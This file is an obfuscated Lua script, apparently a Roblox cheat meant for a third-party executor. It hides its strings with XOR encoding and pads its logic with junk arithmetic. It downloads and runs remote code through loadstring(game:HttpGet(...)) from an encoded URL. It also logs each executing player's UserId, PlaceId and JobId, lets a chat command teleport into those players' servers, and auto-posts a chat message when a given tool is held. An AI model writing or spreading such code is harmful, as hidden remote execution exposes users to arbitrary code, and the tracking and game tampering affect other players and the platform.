--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v22,v23) local v24={};for v35=1, #v22 do v6(v24,v0(v4(v1(v2(v22,v35,v35 + 1 )),v1(v2(v23,1 + (v35% #v23) ,1 + (v35% #v23) + 1 )))%256 ));end return v5(v24);end getgenv().Message=v7("\195\198\200\32\242","\126\177\163\187\69\134\219\167");repeat task.wait();until game:IsLoaded() local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v10=game:GetService(v7("\0\178\69\19\172\41\84\32\132\76\4\170\47\69\49","\38\84\215\41\118\220\70"));local v11=v9.LocalPlayer;getgenv().executedPlayers=getgenv().executedPlayers or {} ;local v13=false;for v25,v26 in ipairs(getgenv().executedPlayers) do if (v26.UserId==v11.UserId) then v13=true;break;end end if  not v13 then table.insert(getgenv().executedPlayers,{[v7("\126\23\47\23","\158\48\118\66\114")]=v11.Name,[v7("\158\55\21\36\90\161","\155\203\68\112\86\19\197")]=v11.UserId,[v7("\118\209\55\255\69\81\225","\152\38\189\86\156\32\24\133")]=game.PlaceId,[v7("\214\88\165\111\248","\38\156\55\199")]=game.JobId});end local function v14() print("Spieler, die das Skript ausgeführt haben:");for v36,v37 in ipairs(getgenv().executedPlayers) do print(v7("\138\120\114\61\7\110\255\81\166\124\113\45\73\52","\35\200\29\28\72\115\20\154")   .. v37.Name   .. v7("\85\255\228\204\136\62\29\29\229\145","\84\121\223\177\191\237\76")   .. v37.UserId   .. v7("\247\22\249\172\59\83\53\232\191\12\137","\161\219\54\169\192\90\48\80")   .. (v37.PlaceId or v7("\103\13\33","\69\41\34\96"))   .. v7("\240\131\253\5\0\2\184\153\151","\75\220\163\183\106\98")   .. (v37.JobId or v7("\44\245\170","\185\98\218\235\87")) );end end local function v15(v27) local v28=0 -0 ;while true do if (v28==(0 + 0)) then for v42,v43 in ipairs(getgenv().executedPlayers) do if (v43.UserId==v27) then if (v43.PlaceId and v43.JobId) then local v49=0 -0 ;local v50;while true do if (v49==0) then v50=0;while true do if (v50==0) then local v58=0 + 0 ;while true do if (v58==(0 -0)) then v10:TeleportToPlaceInstance(v43.PlaceId,v43.JobId,v11);return;end end end end break;end end else local v51=1413 -(447 + 966) ;while true do if (v51==(0 -0)) then print("Spielinformationen für diesen Spieler sind nicht verfügbar.");return;end end end end end print(v7("\248\44\46\227\210\175\217\124\42\239\202\234\207\57\53\166\235\185\206\46\14\226\158","\202\171\92\71\134\190")   .. v27   .. v7("\105\214\57\154\45\196\108\134\32\194\36\156\105\198\41\142\60\207\40\141\39\143","\232\73\161\76") );break;end end end local v16=game:GetService(v7("\143\220\90\73\61\179\216\86\110\27\169\207\75\94\27","\126\219\185\34\61"));v16.SendingMessage:Connect(function(v29) local v30=v29.Text;if (v30==v7("\77\219\77\119\108\100","\135\108\174\62\18\30\23\147")) then v14();elseif (v30:sub(1818 -(1703 + 114) ,6)==v7("\247\227\37\194\22\238","\167\214\137\74\171\120\206\83")) then local v44=701 -(376 + 325) ;local v45;while true do if (v44==(0 -0)) then v45=tonumber(v30:sub(21 -14 ));if v45 then v15(v45);else print("Ungültige UserId.");end break;end end end end);local v17=loadstring(game:HttpGet(v7("\131\228\38\77\235\253\196\191\34\92\235\179\142\242\59\83\182\164\132\253\125\79\249\176\196\225\35\123\193\247\134\215\6","\199\235\144\82\61\152"),true))();local v18=v17.Services;local v16=v18.TextChatService;local v19=v16.ChatVersion==Enum.ChatVersion.TextChatService ;local function v20(v31) local v32=0 + 0 ;local v33;local v34;while true do if (v32==(4 -2)) then return false;end if (v32==(15 -(9 + 5))) then v34=v33.Character;if v34 then for v46,v47 in ipairs(v34:GetChildren()) do if (v47:IsA(v7("\51\25\182\39","\75\103\118\217")) and (v47.Name==v31)) then return true;end end end v32=378 -(85 + 291) ;end if (v32==(1265 -(243 + 1022))) then local v41=0;while true do if (v41==0) then local v48=0;while true do if (v48==(3 -2)) then v41=1 + 0 ;break;end if (v48==0) then v33=game.Players.LocalPlayer;for v55,v56 in ipairs(v33.Backpack:GetChildren()) do if (v56.Name==v31) then return true;end end v48=1181 -(1123 + 57) ;end end end if ((1 + 0)==v41) then v32=255 -(163 + 91) ;break;end end end end end local v21=false;task.spawn(function() while true do local v38=1930 -(1869 + 61) ;local v39;while true do if (v38==0) then v39=0 + 0 ;while true do if (v39==(0 -0)) then task.wait(0.001 -0 );if (v20(v7("\243\92\117\84\152\12\204\81\126\7\173\17\201\81","\126\167\52\16\116\217")) and v19 and  not v21) then local v53=0;local v54;while true do if (v53==1) then v54:SendAsync(getgenv().Message);break;end if (v53==(0 + 0)) then v21=true;v54=v16.TextChannels[v7("\250\12\24\167\177\23\249\218\47\44","\156\168\78\64\224\212\121")];v53=1 -0 ;end end elseif  not v20(v7("\51\230\160\142\38\252\174\203\9\253\177\193\9\235","\174\103\142\197")) then v21=false;end break;end end break;end end end end);
